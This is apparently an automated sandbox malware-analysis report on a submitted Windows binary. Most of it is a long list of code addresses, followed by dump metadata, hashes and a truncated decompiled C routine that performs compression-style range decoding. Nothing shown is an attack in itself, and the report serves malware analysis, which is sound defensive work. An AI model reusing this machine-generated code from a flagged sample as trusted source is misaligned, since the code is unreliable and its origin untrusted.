                                                                                                                          0x0040741a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040741c
                                                                                                                          0x0040741c
                                                                                                                          0x00407420
                                                                                                                          0x004075cf
                                                                                                                          0x00000000
                                                                                                                          0x004075cf
                                                                                                                          0x0040742c
                                                                                                                          0x00407433
                                                                                                                          0x0040743b
                                                                                                                          0x0040743b
                                                                                                                          0x0040743b
                                                                                                                          0x0040743e
                                                                                                                          0x00407441
                                                                                                                          0x00407441
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d5f
                                                                                                                          0x00406d61
                                                                                                                          0x00406d64
                                                                                                                          0x00406dd5
                                                                                                                          0x00406dd8
                                                                                                                          0x00406ddb
                                                                                                                          0x00406de2
                                                                                                                          0x00406dec
                                                                                                                          0x00000000
                                                                                                                          0x00406dec
                                                                                                                          0x00406d66
                                                                                                                          0x00406d6a
                                                                                                                          0x00406d6d
                                                                                                                          0x00406d6f
                                                                                                                          0x00406d72
                                                                                                                          0x00406d75
                                                                                                                          0x00406d77
                                                                                                                          0x00406d7a
                                                                                                                          0x00406d7c
                                                                                                                          0x00406d81
                                                                                                                          0x00406d84
                                                                                                                          0x00406d87
                                                                                                                          0x00406d8b
                                                                                                                          0x00406d92
                                                                                                                          0x00406d95
                                                                                                                          0x00406d9c
                                                                                                                          0x00406da0
                                                                                                                          0x00406da8
                                                                                                                          0x00406da8
                                                                                                                          0x00406da8
                                                                                                                          0x00406da2
                                                                                                                          0x00406da2
                                                                                                                          0x00406da2
                                                                                                                          0x00406d97
                                                                                                                          0x00406d97
                                                                                                                          0x00406d97
                                                                                                                          0x00406dac
                                                                                                                          0x00406daf
                                                                                                                          0x00406dcd
                                                                                                                          0x00406dcf
                                                                                                                          0x00000000
                                                                                                                          0x00406dcf
                                                                                                                          0x00406db1
                                                                                                                          0x00406db4
                                                                                                                          0x00406db7
                                                                                                                          0x00406dba
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbf
                                                                                                                          0x00406dc2
                                                                                                                          0x00406dc4
                                                                                                                          0x00406dc5
                                                                                                                          0x00406dc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ffe
                                                                                                                          0x00407002
                                                                                                                          0x00407020
                                                                                                                          0x00407023
                                                                                                                          0x0040702a
                                                                                                                          0x0040702d
                                                                                                                          0x00407030
                                                                                                                          0x00407033
                                                                                                                          0x00407036
                                                                                                                          0x00407039
                                                                                                                          0x0040703b
                                                                                                                          0x00407042
                                                                                                                          0x00407043
                                                                                                                          0x00407045
                                                                                                                          0x00407048
                                                                                                                          0x0040704b
                                                                                                                          0x0040704e
                                                                                                                          0x0040704e
                                                                                                                          0x00407053
                                                                                                                          0x00000000
                                                                                                                          0x00407053
                                                                                                                          0x00407004
                                                                                                                          0x00407007
                                                                                                                          0x0040700a
                                                                                                                          0x00407014
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407068
                                                                                                                          0x0040706c
                                                                                                                          0x0040708f
                                                                                                                          0x00407092
                                                                                                                          0x00407095
                                                                                                                          0x0040709f
                                                                                                                          0x0040706e
                                                                                                                          0x0040706e
                                                                                                                          0x00407071
                                                                                                                          0x00407074
                                                                                                                          0x00407077
                                                                                                                          0x00407084
                                                                                                                          0x00407087
                                                                                                                          0x00407087
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070ab
                                                                                                                          0x004070af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070b5
                                                                                                                          0x004070b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070bf
                                                                                                                          0x004070c1
                                                                                                                          0x004070c5
                                                                                                                          0x004070c5
                                                                                                                          0x004070c8
                                                                                                                          0x004070cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040711c
                                                                                                                          0x00407120
                                                                                                                          0x00407127
                                                                                                                          0x0040712a
                                                                                                                          0x0040712d
                                                                                                                          0x00407137
                                                                                                                          0x00000000
                                                                                                                          0x00407137
                                                                                                                          0x00407122
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407143
                                                                                                                          0x00407147
                                                                                                                          0x0040714e
                                                                                                                          0x00407151
                                                                                                                          0x00407154
                                                                                                                          0x00407149
                                                                                                                          0x00407149
                                                                                                                          0x00407149
                                                                                                                          0x00407157
                                                                                                                          0x0040715a
                                                                                                                          0x0040715d
                                                                                                                          0x0040715d
                                                                                                                          0x00407160
                                                                                                                          0x00407163
                                                                                                                          0x00407166
                                                                                                                          0x00407166
                                                                                                                          0x00407169
                                                                                                                          0x00407170
                                                                                                                          0x00407175
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407203
                                                                                                                          0x00407203
                                                                                                                          0x00407207
                                                                                                                          0x004075a5
                                                                                                                          0x00000000
                                                                                                                          0x004075a5
                                                                                                                          0x0040720d
                                                                                                                          0x00407210
                                                                                                                          0x00407213
                                                                                                                          0x00407217
                                                                                                                          0x0040721a
                                                                                                                          0x00407220
                                                                                                                          0x00407222
                                                                                                                          0x00407222
                                                                                                                          0x00407222
                                                                                                                          0x00407225
                                                                                                                          0x00407228
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406df8
                                                                                                                          0x00406df8
                                                                                                                          0x00406dfc
                                                                                                                          0x00407569
                                                                                                                          0x00000000
                                                                                                                          0x00407569
                                                                                                                          0x00406e02
                                                                                                                          0x00406e05
                                                                                                                          0x00406e08
                                                                                                                          0x00406e0c
                                                                                                                          0x00406e0f
                                                                                                                          0x00406e15
                                                                                                                          0x00406e17
                                                                                                                          0x00406e17
                                                                                                                          0x00406e17
                                                                                                                          0x00406e1a
                                                                                                                          0x00406e1d
                                                                                                                          0x00406e1d
                                                                                                                          0x00406e20
                                                                                                                          0x00406e23
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e29
                                                                                                                          0x00406e2f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e35
                                                                                                                          0x00406e35
                                                                                                                          0x00406e39
                                                                                                                          0x00406e3c
                                                                                                                          0x00406e3f
                                                                                                                          0x00406e42
                                                                                                                          0x00406e45
                                                                                                                          0x00406e46
                                                                                                                          0x00406e49
                                                                                                                          0x00406e4b
                                                                                                                          0x00406e51
                                                                                                                          0x00406e54
                                                                                                                          0x00406e57
                                                                                                                          0x00406e5a
                                                                                                                          0x00406e5d
                                                                                                                          0x00406e60
                                                                                                                          0x00406e63
                                                                                                                          0x00406e7f
                                                                                                                          0x00406e82
                                                                                                                          0x00406e85
                                                                                                                          0x00406e88
                                                                                                                          0x00406e8f
                                                                                                                          0x00406e93
                                                                                                                          0x00406e95
                                                                                                                          0x00406e99
                                                                                                                          0x00406e65
                                                                                                                          0x00406e65
                                                                                                                          0x00406e69
                                                                                                                          0x00406e71
                                                                                                                          0x00406e76
                                                                                                                          0x00406e78
                                                                                                                          0x00406e7a
                                                                                                                          0x00406e7a
                                                                                                                          0x00406e9c
                                                                                                                          0x00406ea3
                                                                                                                          0x00406ea6
                                                                                                                          0x00000000
                                                                                                                          0x00406eac
                                                                                                                          0x00000000
                                                                                                                          0x00406eac
                                                                                                                          0x00000000
                                                                                                                          0x00406eb1
                                                                                                                          0x00406eb1
                                                                                                                          0x00406eb5
                                                                                                                          0x00407575
                                                                                                                          0x00000000
                                                                                                                          0x00407575
                                                                                                                          0x00406ebb
                                                                                                                          0x00406ebe
                                                                                                                          0x00406ec1
                                                                                                                          0x00406ec5
                                                                                                                          0x00406ec8
                                                                                                                          0x00406ece
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed3
                                                                                                                          0x00406ed6
                                                                                                                          0x00406ed6
                                                                                                                          0x00406ed6
                                                                                                                          0x00406edc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ede
                                                                                                                          0x00406ee1
                                                                                                                          0x00406ee4
                                                                                                                          0x00406ee7
                                                                                                                          0x00406eea
                                                                                                                          0x00406eed
                                                                                                                          0x00406ef0
                                                                                                                          0x00406ef3
                                                                                                                          0x00406ef6
                                                                                                                          0x00406ef9
                                                                                                                          0x00406efc
                                                                                                                          0x00406f14
                                                                                                                          0x00406f17
                                                                                                                          0x00406f1a
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f20
                                                                                                                          0x00406f24
                                                                                                                          0x00406f26
                                                                                                                          0x00406efe
                                                                                                                          0x00406efe
                                                                                                                          0x00406f06
                                                                                                                          0x00406f0b
                                                                                                                          0x00406f0d
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f29
                                                                                                                          0x00406f30
                                                                                                                          0x00406f33
                                                                                                                          0x00000000
                                                                                                                          0x00406f35
                                                                                                                          0x00000000
                                                                                                                          0x00406f35
                                                                                                                          0x00406f33
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f75
                                                                                                                          0x00406f75
                                                                                                                          0x00406f79
                                                                                                                          0x00407581
                                                                                                                          0x00000000
                                                                                                                          0x00407581
                                                                                                                          0x00406f7f
                                                                                                                          0x00406f82
                                                                                                                          0x00406f85
                                                                                                                          0x00406f89
                                                                                                                          0x00406f8c
                                                                                                                          0x00406f92
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f97
                                                                                                                          0x00406f9a
                                                                                                                          0x00406f9a
                                                                                                                          0x00406fa0
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f41
                                                                                                                          0x00000000
                                                                                                                          0x00406f41
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa5
                                                                                                                          0x00406fa8
                                                                                                                          0x00406fab
                                                                                                                          0x00406fae
                                                                                                                          0x00406fb1
                                                                                                                          0x00406fb4
                                                                                                                          0x00406fb7
                                                                                                                          0x00406fba
                                                                                                                          0x00406fbd
                                                                                                                          0x00406fc0
                                                                                                                          0x00406fd8
                                                                                                                          0x00406fdb
                                                                                                                          0x00406fde
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe4
                                                                                                                          0x00406fe8
                                                                                                                          0x00406fea
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fca
                                                                                                                          0x00406fcf
                                                                                                                          0x00406fd1
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fed
                                                                                                                          0x00406ff4
                                                                                                                          0x00406ff7
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00407286
                                                                                                                          0x00407286
                                                                                                                          0x0040728a
                                                                                                                          0x004075b1
                                                                                                                          0x00000000
                                                                                                                          0x004075b1
                                                                                                                          0x00407290
                                                                                                                          0x00407293
                                                                                                                          0x00407296
                                                                                                                          0x0040729a
                                                                                                                          0x0040729d
                                                                                                                          0x004072a3
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407056
                                                                                                                          0x00407056
                                                                                                                          0x00407059
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407395
                                                                                                                          0x00407399
                                                                                                                          0x004073bb
                                                                                                                          0x004073be
                                                                                                                          0x004073c8
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x004073cb
                                                                                                                          0x0040739b
                                                                                                                          0x0040739e
                                                                                                                          0x004073a2
                                                                                                                          0x004073a5
                                                                                                                          0x004073a5
                                                                                                                          0x004073a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407452
                                                                                                                          0x00407456
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x0040747b
                                                                                                                          0x00407482
                                                                                                                          0x00407489
                                                                                                                          0x00407489
                                                                                                                          0x00000000
                                                                                                                          0x00407489
                                                                                                                          0x00407458
                                                                                                                          0x0040745b
                                                                                                                          0x0040745e
                                                                                                                          0x00407461
                                                                                                                          0x00407468
                                                                                                                          0x004073ac
                                                                                                                          0x004073ac
                                                                                                                          0x004073af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407543
                                                                                                                          0x00407546
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040717d
                                                                                                                          0x0040717f
                                                                                                                          0x00407186
                                                                                                                          0x00407187
                                                                                                                          0x00407189
                                                                                                                          0x0040718c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407194
                                                                                                                          0x00407197
                                                                                                                          0x0040719a
                                                                                                                          0x0040719c
                                                                                                                          0x0040719e
                                                                                                                          0x0040719e
                                                                                                                          0x0040719f
                                                                                                                          0x004071a2
                                                                                                                          0x004071a9
                                                                                                                          0x004071ac
                                                                                                                          0x004071ba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407490
                                                                                                                          0x00407490
                                                                                                                          0x00407493
                                                                                                                          0x0040749a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040749f
                                                                                                                          0x0040749f
                                                                                                                          0x004074a3
                                                                                                                          0x004075db
                                                                                                                          0x00000000
                                                                                                                          0x004075db
                                                                                                                          0x004074a9
                                                                                                                          0x004074ac
                                                                                                                          0x004074af
                                                                                                                          0x004074b3
                                                                                                                          0x004074b6
                                                                                                                          0x004074bc
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074c1
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c7
                                                                                                                          0x004074c7
                                                                                                                          0x004074cb
                                                                                                                          0x0040752b
                                                                                                                          0x0040752e
                                                                                                                          0x00407533
                                                                                                                          0x00407534
                                                                                                                          0x00407536
                                                                                                                          0x00407538
                                                                                                                          0x0040753b
                                                                                                                          0x00407447
                                                                                                                          0x00407447
                                                                                                                          0x00000000
                                                                                                                          0x00407447
                                                                                                                          0x004074cd
                                                                                                                          0x004074d3
                                                                                                                          0x004074d6
                                                                                                                          0x004074d9
                                                                                                                          0x004074dc
                                                                                                                          0x004074df
                                                                                                                          0x004074e2
                                                                                                                          0x004074e5
                                                                                                                          0x004074e8
                                                                                                                          0x004074eb
                                                                                                                          0x004074ee
                                                                                                                          0x00407507
                                                                                                                          0x0040750a
                                                                                                                          0x0040750d
                                                                                                                          0x00407510
                                                                                                                          0x00407514
                                                                                                                          0x00407516
                                                                                                                          0x00407516
                                                                                                                          0x00407517
                                                                                                                          0x0040751a
                                                                                                                          0x004074f0
                                                                                                                          0x004074f0
                                                                                                                          0x004074f8
                                                                                                                          0x004074fd
                                                                                                                          0x004074ff
                                                                                                                          0x00407502
                                                                                                                          0x00407502
                                                                                                                          0x0040751d
                                                                                                                          0x00407524
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x004071c2
                                                                                                                          0x004071c5
                                                                                                                          0x004071fb
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732e
                                                                                                                          0x0040732e
                                                                                                                          0x00407331
                                                                                                                          0x00407333
                                                                                                                          0x004075bd
                                                                                                                          0x00000000
                                                                                                                          0x004075bd
                                                                                                                          0x00407339
                                                                                                                          0x0040733c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407342
                                                                                                                          0x00407346
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00000000
                                                                                                                          0x00407349
                                                                                                                          0x004071c7
                                                                                                                          0x004071c9
                                                                                                                          0x004071cb
                                                                                                                          0x004071cd
                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d5
                                                                                                                          0x004071d8
                                                                                                                          0x004071db
                                                                                                                          0x004071f1
                                                                                                                          0x004071f6
                                                                                                                          0x0040722e
                                                                                                                          0x0040722e
                                                                                                                          0x00407232
                                                                                                                          0x0040725e
                                                                                                                          0x00407260
                                                                                                                          0x00407267
                                                                                                                          0x0040726a
                                                                                                                          0x0040726d
                                                                                                                          0x0040726d
                                                                                                                          0x00407272
                                                                                                                          0x00407272
                                                                                                                          0x00407274
                                                                                                                          0x00407277
                                                                                                                          0x0040727e
                                                                                                                          0x00407281
                                                                                                                          0x004072ae
                                                                                                                          0x004072ae
                                                                                                                          0x004072b1
                                                                                                                          0x004072b4
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00000000
                                                                                                                          0x00407328
                                                                                                                          0x004072b6
                                                                                                                          0x004072bc
                                                                                                                          0x004072bf
                                                                                                                          0x004072c2
                                                                                                                          0x004072c5
                                                                                                                          0x004072c8
                                                                                                                          0x004072cb
                                                                                                                          0x004072ce
                                                                                                                          0x004072d1
                                                                                                                          0x004072d4
                                                                                                                          0x004072d7
                                                                                                                          0x004072f0
                                                                                                                          0x004072f2
                                                                                                                          0x004072f5
                                                                                                                          0x004072f6
                                                                                                                          0x004072f9
                                                                                                                          0x004072fb
                                                                                                                          0x004072fe
                                                                                                                          0x00407300
                                                                                                                          0x00407302
                                                                                                                          0x00407305
                                                                                                                          0x00407307
                                                                                                                          0x0040730a
                                                                                                                          0x0040730e
                                                                                                                          0x00407310
                                                                                                                          0x00407310
                                                                                                                          0x00407311
                                                                                                                          0x00407314
                                                                                                                          0x00407317
                                                                                                                          0x004072d9
                                                                                                                          0x004072d9
                                                                                                                          0x004072e1
                                                                                                                          0x004072e6
                                                                                                                          0x004072e8
                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x0040731a
                                                                                                                          0x00407321
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407321
                                                                                                                          0x00407234
                                                                                                                          0x00407237
                                                                                                                          0x00407239
                                                                                                                          0x0040723c
                                                                                                                          0x0040723f
                                                                                                                          0x00407242
                                                                                                                          0x00407244
                                                                                                                          0x00407247
                                                                                                                          0x0040724a
                                                                                                                          0x0040724a
                                                                                                                          0x0040724d
                                                                                                                          0x0040724d
                                                                                                                          0x00407250
                                                                                                                          0x00407257
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407257
                                                                                                                          0x004071dd
                                                                                                                          0x004071e0
                                                                                                                          0x004071e2
                                                                                                                          0x004071e5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f44
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x0040758d
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f5a
                                                                                                                          0x00406f5d
                                                                                                                          0x00406f60
                                                                                                                          0x00406f62
                                                                                                                          0x00406f65
                                                                                                                          0x00406f68
                                                                                                                          0x00406f6b
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070cf
                                                                                                                          0x004070cf
                                                                                                                          0x004070d3
                                                                                                                          0x00407599
                                                                                                                          0x00000000
                                                                                                                          0x00407599
                                                                                                                          0x004070d9
                                                                                                                          0x004070dc
                                                                                                                          0x004070df
                                                                                                                          0x004070e2
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e7
                                                                                                                          0x004070ea
                                                                                                                          0x004070ed
                                                                                                                          0x004070f0
                                                                                                                          0x004070f3
                                                                                                                          0x004070f6
                                                                                                                          0x004070f7
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070fc
                                                                                                                          0x004070ff
                                                                                                                          0x00407102
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407108
                                                                                                                          0x0040710a
                                                                                                                          0x0040710a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x00407350
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407356
                                                                                                                          0x00407359
                                                                                                                          0x0040735c
                                                                                                                          0x0040735f
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407364
                                                                                                                          0x00407367
                                                                                                                          0x0040736a
                                                                                                                          0x0040736d
                                                                                                                          0x00407370
                                                                                                                          0x00407373
                                                                                                                          0x00407374
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407379
                                                                                                                          0x0040737c
                                                                                                                          0x0040737f
                                                                                                                          0x00407382
                                                                                                                          0x00407385
                                                                                                                          0x00407389
                                                                                                                          0x0040738b
                                                                                                                          0x0040738e
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x0040710d
                                                                                                                          0x0040710d
                                                                                                                          0x00000000
                                                                                                                          0x0040710d
                                                                                                                          0x0040738e
                                                                                                                          0x004075c3
                                                                                                                          0x004075e5
                                                                                                                          0x004075eb
                                                                                                                          0x004075ed
                                                                                                                          0x004075f4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x004075fa
                                                                                                                          0x004075fa
                                                                                                                          0x00000000

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                                          • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                                                                                          • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                                                                                          • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406FFE() {
                                                                                                                          				signed int _t539;
                                                                                                                          				unsigned short _t540;
                                                                                                                          				signed int _t541;
                                                                                                                          				void _t542;
                                                                                                                          				signed int _t543;
                                                                                                                          				signed int _t544;
                                                                                                                          				signed int _t573;
                                                                                                                          				signed int _t576;
                                                                                                                          				signed int _t597;
                                                                                                                          				signed int* _t614;
                                                                                                                          				void* _t621;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t621 - 0x40) != 1) {
                                                                                                                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                                                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                          						_t539 =  *(_t621 - 4) + 0x664;
                                                                                                                          						 *(_t621 - 0x58) = _t539;
                                                                                                                          						goto L68;
                                                                                                                          					} else {
                                                                                                                          						 *(__ebp - 0x84) = 8;
                                                                                                                          						while(1) {
                                                                                                                          							L132:
                                                                                                                          							 *(_t621 - 0x54) = _t614;
                                                                                                                          							while(1) {
                                                                                                                          								L133:
                                                                                                                          								_t540 =  *_t614;
                                                                                                                          								_t597 = _t540 & 0x0000ffff;
                                                                                                                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                          								if( *(_t621 - 0xc) >= _t573) {
                                                                                                                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                          									 *(_t621 - 0x40) = 1;
                                                                                                                          									_t541 = _t540 - (_t540 >> 5);
                                                                                                                          									 *_t614 = _t541;
                                                                                                                          								} else {
                                                                                                                          									 *(_t621 - 0x10) = _t573;
                                                                                                                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                          								}
                                                                                                                          								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                          									goto L139;
                                                                                                                          								}
                                                                                                                          								L137:
                                                                                                                          								if( *(_t621 - 0x6c) == 0) {
                                                                                                                          									 *(_t621 - 0x88) = 5;
                                                                                                                          									L170:
                                                                                                                          									_t576 = 0x22;
                                                                                                                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                                                          									_t544 = 0;
                                                                                                                          									L172:
                                                                                                                          									return _t544;
                                                                                                                          								}
                                                                                                                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                                                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                          								L139:
                                                                                                                          								_t542 =  *(_t621 - 0x84);
                                                                                                                          								while(1) {
                                                                                                                          									 *(_t621 - 0x88) = _t542;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										_t543 =  *(_t621 - 0x88);
                                                                                                                          										if(_t543 > 0x1c) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                                                                                          											case 0:
                                                                                                                          												if( *(_t621 - 0x6c) == 0) {
                                                                                                                          													goto L170;
                                                                                                                          												}
                                                                                                                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                          												_t543 =  *( *(_t621 - 0x70));
                                                                                                                          												if(_t543 > 0xe1) {
                                                                                                                          													goto L171;
                                                                                                                          												}
                                                                                                                          												_t547 = _t543 & 0x000000ff;
                                                                                                                          												_push(0x2d);
                                                                                                                          												asm("cdq");
                                                                                                                          												_pop(_t578);
                                                                                                                          												_push(9);
                                                                                                                          												_pop(_t579);
                                                                                                                          												_t617 = _t547 / _t578;
                                                                                                                          												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                                                          												asm("cdq");
                                                                                                                          												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                                                          												 *(_t621 - 0x3c) = _t612;
                                                                                                                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                                                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                                                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                                                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                                                          													L10:
                                                                                                                          													if(_t620 == 0) {
                                                                                                                          														L12:
